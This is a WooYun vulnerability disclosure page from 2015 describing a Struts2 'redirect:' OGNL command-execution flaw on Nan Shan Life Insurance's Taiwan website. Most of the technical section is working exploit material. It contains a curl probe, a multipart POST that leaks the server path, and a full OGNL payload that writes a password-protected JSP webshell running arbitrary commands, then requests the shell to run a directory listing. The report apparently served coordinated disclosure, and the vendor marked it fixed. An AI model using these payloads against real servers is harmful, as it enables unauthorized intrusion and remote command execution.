当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161350

漏洞标题:南山人寿官网命令执行可Getshell(臺灣地區)

相关厂商:南山人寿

漏洞作者:

提交时间:2015-12-15 11:56

修复时间:2016-01-27 14:41

公开时间:2016-01-27 14:41

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态: 已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-15: 细节已通知厂商并且等待厂商处理中
2015-12-15: 厂商已经确认,细节仅向厂商公开
2015-12-25: 细节向核心白帽子及相关领域专家公开
2016-01-04: 细节向普通白帽子公开
2016-01-14: 细节向实习白帽子公开
2016-01-27: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

台湾南山人寿官网命令执行可getshell

详细说明:

访问url:https://**.**.**.**/eServicePublic/publicweb/office/OfficeArticle.action?chanelMap=13,如图:

QQ20151214-5@2x.jpg


执行如下命令,看是否进行302跳转。

$ curl -i https://**.**.**.**/eServicePublic/publicweb/office/OfficeArticle.action?chanelMap=13 -F "redirect:/xxoo=-1"
HTTP/1.1 100 Continue
HTTP/1.1 302 Found
Date: Mon, 14 Dec 2015 14:16:38 GMT
Server: IBM_HTTP_Server
X-Powered-By: Servlet/3.0
Location: https://**.**.**.**/eServicePublic/xxoo
Content-Length: 0
Content-Type: text/plain
Content-Language: en-US


发现302跳转。抓包修改数据包的method为POST方式,并获取web应用部署的绝对路径见如下:

POST /eServicePublic/publicweb/office/OfficeArticle.action?chanelMap=13 HTTP/1.1
Host: **.**.**.**
Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=0000010JCkqr9Egyntbk-S5O7On:PLWS9_eServ; _ga=GA1.3.246686188.1450007096
Content-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721
Content-Length: 258
--------------------------5423a63046c50524a84963968721
Content-Disposition: form-data; name="redirect:/${#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")}"
-1
--------------------------5423a63046c50524a84963968721


执行效果如下图:

QQ20151214-6@2x.jpg


接下来执行写入webshell命令(一句话木马)200081214.jsp:

POST /eServicePublic/publicweb/office/OfficeArticle.action?chanelMap=13 HTTP/1.1
Host: **.**.**.**
Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=0000010JCkqr9Egyntbk-S5O7On:PLWS9_eServ; _ga=GA1.3.246686188.1450007096
Content-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721
Content-Length: 659
--------------------------5423a63046c50524a84963968721
Content-Disposition: form-data; name="redirect:/${"x"+(new **.**.**.**.PrintWriter("/opt/WebSphere/AppServer/profiles/eService/installedApps/WASCell/eServicePublicEAR.ear/eServicePublic.war/200081214.jsp")).append("<%if(\"023\".equals(request.getParameter(\"pwd\"))){**.**.**.**.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"i\")).getInputStream()\u003bint a = -1\u003bbyte[] b = new byte[2048]\u003bout.print(\"<pre>\")\u003bwhile((a=in.read(b))!=-1){out.println(new String(b))\u003b}out.print(\"</pre>\")\u003b}%>").close()}"
-1
--------------------------5423a63046c50524a84963968721


执行效果如下:

QQ20151214-7@2x.jpg


漏洞证明:

访问刚刚上传后的webshell:https://**.**.**.**/eServicePublic/200081214.jsp?pwd=023&i=ls%20-l%20/opt/WebSphere/AppServer/profiles/eService/installedApps/WASCell/eServicePublicEAR.ear/eServicePublic.war/如下图:

QQ20151214-8@2x.jpg


QQ20151214-9@2x.jpg

修复方案:

升级Struts2版本到最新版

版权声明:转载请注明来源 @乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-12-15 23:52

厂商回复:

感謝通報

最新状态:

2016-01-27:已修復

漏洞评价:

评价